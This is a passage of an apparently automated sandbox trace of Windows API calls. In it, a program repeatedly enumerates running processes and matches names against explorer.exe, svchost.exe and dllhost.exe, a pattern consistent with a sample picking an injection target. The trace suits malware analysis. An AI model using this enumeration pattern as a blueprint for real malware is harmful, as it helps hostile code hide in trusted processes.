lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0230.354] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0230.354] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0230.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0230.355] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0230.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0230.355] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.355] CloseHandle (hObject=0xd8) returned 1 [0230.355] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0230.355] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0230.355] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0230.355] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0230.356] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0230.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0230.356] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0230.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0230.357] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.357] CloseHandle (hObject=0xd8) returned 1 [0230.357] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0230.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0230.357] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.357] CloseHandle (hObject=0xd8) returned 1 [0230.357] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0230.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0230.358] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.358] CloseHandle (hObject=0xd8) returned 1 [0230.358] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0230.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0230.359] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.359] CloseHandle (hObject=0xd8) returned 1 [0230.359] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0230.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0230.359] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.359] CloseHandle (hObject=0xd8) returned 1 [0230.359] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0230.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0230.360] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.360] CloseHandle (hObject=0xd8) returned 1 [0230.360] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0230.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0230.360] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.360] CloseHandle (hObject=0xd8) returned 1 [0230.361] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0230.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0230.361] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.361] CloseHandle (hObject=0xd8) returned 1 [0230.361] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0230.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0230.362] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.362] CloseHandle (hObject=0xd8) returned 1 [0230.362] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0230.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0230.362] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.362] CloseHandle (hObject=0xd8) returned 1 [0230.362] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0230.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0230.363] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.363] CloseHandle (hObject=0xd8) returned 1 [0230.363] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0230.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0230.363] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.363] CloseHandle (hObject=0xd8) returned 1 [0230.363] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0230.364] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0230.364] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.364] CloseHandle (hObject=0xd8) returned 1 [0230.364] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0230.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0230.365] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.365] CloseHandle (hObject=0xd8) returned 1 [0230.365] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0230.365] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0230.365] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.365] CloseHandle (hObject=0xd8) returned 1 [0230.365] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0230.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0230.367] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.367] CloseHandle (hObject=0xd8) returned 1 [0230.367] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0230.367] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0230.367] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.367] CloseHandle (hObject=0xd8) returned 1 [0230.367] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0230.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0230.368] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.368] CloseHandle (hObject=0xd8) returned 1 [0230.368] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0230.368] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0230.368] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.369] CloseHandle (hObject=0xd8) returned 1 [0230.369] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0230.369] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0230.369] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.369] CloseHandle (hObject=0xd8) returned 1 [0230.369] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0230.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0230.370] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.370] CloseHandle (hObject=0xd8) returned 1 [0230.370] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0230.370] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0230.370] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0230.371] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0230.371] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0230.371] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0230.372] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0230.372] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0230.372] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0230.373] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.373] CloseHandle (hObject=0xd8) returned 1 [0230.373] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0230.373] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0230.373] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0230.373] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.373] CloseHandle (hObject=0xd8) returned 1 [0230.373] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0230.373] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0230.373] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0230.373] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0230.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0230.374] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.374] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0230.375] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.375] CloseHandle (hObject=0xd8) returned 1 [0230.375] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.375] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0230.375] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.375] CloseHandle (hObject=0xd8) returned 1 [0230.375] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0230.375] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.376] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0230.376] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0230.376] CloseHandle (hObject=0xd8) returned 1 [0230.376] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0230.376] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0230.377] CloseHandle (hObject=0xd4) returned 1 [0230.377] Sleep (dwMilliseconds=0x3e8) [0231.388] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0231.390] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0231.390] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0231.390] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0231.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0231.391] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0231.391] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0231.391] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0231.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0231.392] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0231.392] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0231.392] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0231.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0231.393] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0231.393] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0231.393] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0231.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0231.394] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0231.394] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0231.394] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0231.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0231.395] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0231.395] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0231.396] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0231.396] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0231.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 